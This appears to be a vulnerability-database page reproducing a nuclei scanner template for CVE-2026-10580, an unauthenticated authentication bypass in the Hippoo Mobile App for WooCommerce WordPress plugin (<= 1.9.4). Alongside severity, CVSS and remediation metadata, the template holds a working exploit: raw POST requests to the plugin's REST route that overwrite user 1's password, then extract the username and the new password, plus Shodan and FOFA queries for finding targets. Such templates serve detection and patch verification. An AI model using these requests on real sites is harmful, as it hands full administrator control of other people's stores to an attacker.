Lucene search
K

Hippoo Mobile App for WooCommerce <= 1.9.4 - Authentication Bypass to Admin Account Takeover

๐Ÿ—“๏ธย 07 Jul 2026ย 03:01:27Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 13ย Views

Unauthenticated bypass in Hippoo Mobile App for WooCommerce enables admin takeover via password reset.

Related
Refs
Code
id: CVE-2026-10580

info:
  name: Hippoo Mobile App for WooCommerce <= 1.9.4 - Authentication Bypass to Admin Account Takeover
  author: pussycat0x
  severity: critical
  description: |
    Hippoo Mobile App for WooCommerce WordPress plugin <= 1.9.4 contains an authentication bypass caused by logic conflation in user permission checks, letting unauthenticated attackers take over administrator accounts via REST API password reset.
  impact: |
    Unauthenticated attackers can reset any WordPress user's password, including administrators, gaining full administrative control of the site.
  remediation: |
    Update to a version later than 1.9.4 or the latest available version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-194-unauthenticated-authentication-bypass-to-administrator-account-takeover-via-rest-api
    - https://plugins.trac.wordpress.org/changeset/3557733
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-10580
    epss-score: 0.02841
    epss-percentile: 0.84966
    cwe-id: CWE-285
  metadata:
    max-request: 2
    vendor: hippoo
    product: hippoo-mobile-app-for-woocommerce
    framework: wordpress
    verified: true
    shodan-query: http.component:"wordpress"
    fofa-query: body="hippoo"
  tags: cve,cve2026,wordpress,wp-plugin,hippoo,woocommerce,intrusive

variables:
  new_password: "{{rand_base(16)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/hippoo/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Hippoo')"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: plugin_version
        part: body
        group: 1
        regex:
          - 'Stable tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-json/wc-hippoo/v1/ext/wp/v2/users/1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"password":"{{new_password}}"}

      - |
        POST /wp-json/wc-hippoo/v1/ext/wp/v2/users/1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"password":"{{new_password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 || status_code_2 == 200'
          - 'contains_any(body, "is_super_admin","capabilities")'
          - 'contains(body, "woocommerce_meta")'
        condition: and

    extractors:
      - type: regex
        name: username
        part: body
        group: 1
        regex:
          - '"username":"([^"]+)"'

      - type: dsl
        name: new_password
        dsl:
          - new_password
# digest: 490a0046304402200be4e7d89cc854460644f940dc66b7e73f0491fb94ca662dd100fac3ea64095502200972b8a47f642445d4c6e333a9f3dfee68693458429610969c2796c61649de0b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jun 2026 19:03Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.02841
SSVC
13